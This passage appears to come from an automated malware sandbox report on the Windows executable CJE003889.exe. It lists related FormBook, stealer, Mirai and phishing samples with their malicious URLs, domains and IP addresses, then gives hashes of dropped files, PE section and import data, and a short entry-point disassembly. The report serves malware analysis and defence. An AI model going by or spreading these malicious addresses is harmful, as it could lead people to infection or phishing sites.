                                                        1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.joeltcarpenter.online/9pyp/
                                                        ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.cortisalincontrol.net/cbfz/
                                                        W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.matteicapital.online/hyyd/
                                                        FATURA.exeGet hashmaliciousFormBookBrowse
                                                        • www.martaschrimpf.info/qr9f/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        dns.ladipage.comMAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                        • 13.228.81.39
                                                        QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                        • 13.228.81.39
                                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 18.139.62.226
                                                        XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 13.228.81.39
                                                        Swift copy.exeGet hashmaliciousFormBookBrowse
                                                        • 18.139.62.226
                                                        wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                        • 18.139.62.226
                                                        Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 54.179.173.60
                                                        7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUShttps://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 104.18.33.8
                                                        Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                        • 172.67.26.92
                                                        Mozi.m.elfGet hashmaliciousMiraiBrowse
                                                        • 172.71.119.218
                                                        EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                        • 172.67.179.207
                                                        EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                        • 104.21.18.132
                                                        https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                        • 104.16.117.116
                                                        https://on-chainevm.pages.devGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.16.79.73
                                                        https://vcsfi.kidsavancados.com/Get hashmaliciousCaptcha PhishBrowse
                                                        • 104.21.9.144
                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        CLOUDFLARENETUShttps://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 104.18.33.8
                                                        Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                        • 172.67.26.92
                                                        Mozi.m.elfGet hashmaliciousMiraiBrowse
                                                        • 172.71.119.218
                                                        EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                        • 172.67.179.207
                                                        EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                        • 104.21.18.132
                                                        https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                        • 104.16.117.116
                                                        https://on-chainevm.pages.devGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.16.79.73
                                                        https://vcsfi.kidsavancados.com/Get hashmaliciousCaptcha PhishBrowse
                                                        • 104.21.9.144
                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        COGENT-174USMozi.m.elfGet hashmaliciousMiraiBrowse
                                                        • 154.62.73.236
                                                        http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                        • 154.38.174.3
                                                        Josho.sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 38.185.182.57
                                                        Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 154.39.145.13
                                                        Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                        • 38.142.117.240
                                                        hax.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 38.223.114.4
                                                        hax.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 154.30.85.89
                                                        hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 154.48.160.55
                                                        hax.arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 154.44.0.198
                                                        hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 39.0.190.24
                                                        No context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\CJE003889.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):289280
                                                        Entropy (8bit):7.99453362648521
                                                        Encrypted:true
                                                        SSDEEP:6144:iGlwcrXXJdOecxAlXaxxpR0jrgyhr34n16BQR8sL8lqy:iGxrXXRcxhCjrzB4n1cq8sLjy
                                                        MD5:E9BCA64015D52B78FA2472AEE2060303
                                                        SHA1:C20966F6BA5402A89A9D78DFDAB723A02BB91E07
                                                        SHA-256:A7BB2A9E683868C2F17D66EF1A9E63EC52C3F73F1473C355CD0DAAAD4804E02E
                                                        SHA-512:F158F9835AFF473EE9AB44174101843BD1165F7EEC559930A7728B3150FA980096E86DB8475EB2B1C9F3A8AC87A0B85E909B5E1271089B3E0F5484E14B01808C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:|..VSAKEV92E..AI.PJO91Q2.PAKER92EQOAITPJO91Q2VPAKER92EQOAITP.O91_-.^A.L...D..`.<99oIC>U$1,k&3W\*%o#,t"?!.X?....k(=]Wk\BKmTPJO91QKWY.v%5..%6.|)3.P..kR1.[...R".U..l*(.c8Q>m!,.R92EQOAI..JOu0P2....ER92EQOA.TRKD8:Q2.TAKER92EQO!\TPJ_91QBRPAK.R9"EQOCITVJO91Q2VVAKER92EQ?EITRJO91Q2TP..ER)2EAOAIT@JO)1Q2VPA[ER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92E.;$1 PJO.fU2V@AKE.=2EAOAITPJO91Q2VPAkERY2EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQ
                                                        Process:C:\Users\user\Desktop\CJE003889.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):289280
                                                        Entropy (8bit):7.99453362648521
                                                        Encrypted:true
                                                        SSDEEP:6144:iGlwcrXXJdOecxAlXaxxpR0jrgyhr34n16BQR8sL8lqy:iGxrXXRcxhCjrzB4n1cq8sLjy
                                                        MD5:E9BCA64015D52B78FA2472AEE2060303
                                                        SHA1:C20966F6BA5402A89A9D78DFDAB723A02BB91E07
                                                        SHA-256:A7BB2A9E683868C2F17D66EF1A9E63EC52C3F73F1473C355CD0DAAAD4804E02E
                                                        SHA-512:F158F9835AFF473EE9AB44174101843BD1165F7EEC559930A7728B3150FA980096E86DB8475EB2B1C9F3A8AC87A0B85E909B5E1271089B3E0F5484E14B01808C
                                                        Malicious:false
                                                        Preview:|..VSAKEV92E..AI.PJO91Q2.PAKER92EQOAITPJO91Q2VPAKER92EQOAITP.O91_-.^A.L...D..`.<99oIC>U$1,k&3W\*%o#,t"?!.X?....k(=]Wk\BKmTPJO91QKWY.v%5..%6.|)3.P..kR1.[...R".U..l*(.c8Q>m!,.R92EQOAI..JOu0P2....ER92EQOA.TRKD8:Q2.TAKER92EQO!\TPJ_91QBRPAK.R9"EQOCITVJO91Q2VVAKER92EQ?EITRJO91Q2TP..ER)2EAOAIT@JO)1Q2VPA[ER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92E.;$1 PJO.fU2V@AKE.=2EAOAITPJO91Q2VPAkERY2EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQOAITPJO91Q2VPAKER92EQ
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.211718626867483
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:CJE003889.exe
                                                        File size:1'229'312 bytes
                                                        MD5:701f58c31461426d9dd6fafcd8adcd33
                                                        SHA1:ccdb3a9aec59affb20fb94e62bca9a52c5900618
                                                        SHA256:d33029ee722e3376c49c3a557014f649afe3210c2b400336d9bf39062792dfd0
                                                        SHA512:63dd2ad38c39733f10a585ee6fdbc046e81ba1ece8330ffa57361ae844a0d700981e806c1a1a08b0026fe7601dc1a7f37a2df625845ab772b838f2b33608dc48
                                                        SSDEEP:24576:Lu6J33O0c+JY5UZ+XC0kGso6FafmlSyOCw3BEXAgEVqWY:lu0c++OCvkGs9FafQdwxAAgE7Y
                                                        TLSH:0B45CF2273DDC360CB669273BF6AB7016EBF7C610630B85B2F980D7DA950161162D7A3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x427dcd
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6758DDB1 [Wed Dec 11 00:32:49 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                        Instruction
                                                        call 00007F9620EA7E9Ah
                                                        jmp 00007F9620E9AC64h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F9620E9ADEAh
                                                        cmp edi, eax
                                                        jc 00007F9620E9B14Eh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007F9620E9ADE9h
                                                        rep movsb
                                                        jmp 00007F9620E9B0FCh
                                                        cmp ecx, 00000080h
                                                        jc 00007F9620E9AFB4h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007F9620E9ADF0h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007F9620E9B2C0h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007F9620E9AF8Dh
                                                        test edi, 00000003h
                                                        jne 00007F9620E9AF9Eh
                                                        test esi, 00000003h
                                                        jne 00007F9620E9AF7Dh
                                                        bt edi, 02h
                                                        jnc 00007F9620E9ADEFh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007F9620E9ADF3h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007F9620E9AE45h
                                                        bt esi, 03h
                                                        jnc 00007F9620E9AE98h
                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD4 build 31101
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD4 build 31101
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x6386c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x12b0000x711c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc70000x6386c0x63a0093a45919492baeac55ea9cad6bf51d28False0.933292326693852data7.907678801452212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x12b0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xcf7b80x5ab31data1.0003257022112757
                                                        RT_GROUP_ICON0x12a2ec0x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x12a3640x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x12a3780x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x12a38c0x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x12a3a00xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x12a47c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                        DLLImport
                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, 